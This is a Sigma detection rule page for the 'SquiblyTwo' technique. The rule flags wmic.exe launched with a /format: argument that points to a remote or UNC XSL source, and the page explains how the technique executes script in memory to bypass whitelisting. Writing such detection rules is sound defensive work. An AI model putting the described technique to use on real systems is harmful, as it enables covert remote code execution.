Detectionhightest

Potential Remote SquiblyTwo Technique Execution

Detects potential execution of the SquiblyTwo technique that leverages Windows Management Instrumentation (WMI) to execute malicious code remotely. This technique bypasses application whitelisting by using wmic.exe to process malicious XSL (eXtensible Stylesheet Language) scripts that can contain embedded JScript or VBScript. The attack typically works by fetching XSL content from a remote source (using HTTP/HTTPS) and executing it with full trust privileges directly in memory, avoiding disk-based detection mechanisms. This is a common LOLBin (Living Off The Land Binary) technique used for defense evasion and code execution.

Convert In Phoenix Studio

Open this Sigma rule in the converter with the YAML preloaded and ready for backend selection.

Launch

Markus Neis, Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)Created Wed Jan 16Updated Sat Jan 248d63dadf-b91b-4187-87b6-34a1114577eawindows

Log Source

WindowsProcess Creation

ProductWindows← raw: windows

CategoryProcess Creation← raw: process_creation

Events generated when a new process is spawned on the system. Covers command-line arguments, parent/child relationships, and process metadata.

Detection Logic

detection:
    selection_pe:
        - Image|endswith: '\wmic.exe'
        - OriginalFileName: 'wmic.exe'
        - Hashes|contains:  # Sysmon field hashes contains all types
              - 'IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E'
              - 'IMPHASH=37777A96245A3C74EB217308F3546F4C'
              - 'IMPHASH=9D87C9D67CE724033C0B40CC4CA1B206'
              - 'IMPHASH=B12619881D79C3ACADF45E752A58554A'
              - 'IMPHASH=16A48C3CABF98A9DC1BF02C07FE1EA00'
    selection_cli:
        CommandLine|contains|windash: '/format:'
        CommandLine|contains:
            - '://'
            - '\\\\'
    condition: all of selection_*

False Positives

Unknown

False positive likelihood has not been assessed. Additional context may be needed during triage.

References

lolbas-project.github.io

Resolving title…

x.com

MITRE ATT&CK

Tactics

TA0005 · Defense Evasion TA0002 · Execution

Techniques

T1047 · Windows Management Instrumentation T1220 · XSL Script Processing

Sub-techniques

T1059.005 · Visual Basic T1059.007 · JavaScript

Related Rules

SimilarDetectionmedium

WMIC Loading Scripting Libraries

Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e js, vbs, etc). It could be an indicator of SquiblyTwo technique, which uses Windows Management Instrumentation (WMI) to execute malicious code.

Detects similar activity. Both rules may fire on overlapping events.

SimilarDetectionmedium

XSL Script Execution Via WMIC.EXE

Detects the execution of WMIC with the "format" flag to potentially load local XSL files. Adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files.

Detects similar activity. Both rules may fire on overlapping events.

Rule Metadata

Rule ID

8d63dadf-b91b-4187-87b6-34a1114577ea

Status

test

Level

high

Type

Detection

Created

Wed Jan 16

Modified

Sat Jan 24

Author

Markus Neis, Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)

Path

rules/windows/process_creation/proc_creation_win_wmic_squiblytwo_bypass.yml

Raw Tags

attack.defense-evasionattack.t1047attack.t1220attack.executionattack.t1059.005attack.t1059.007

View on GitHub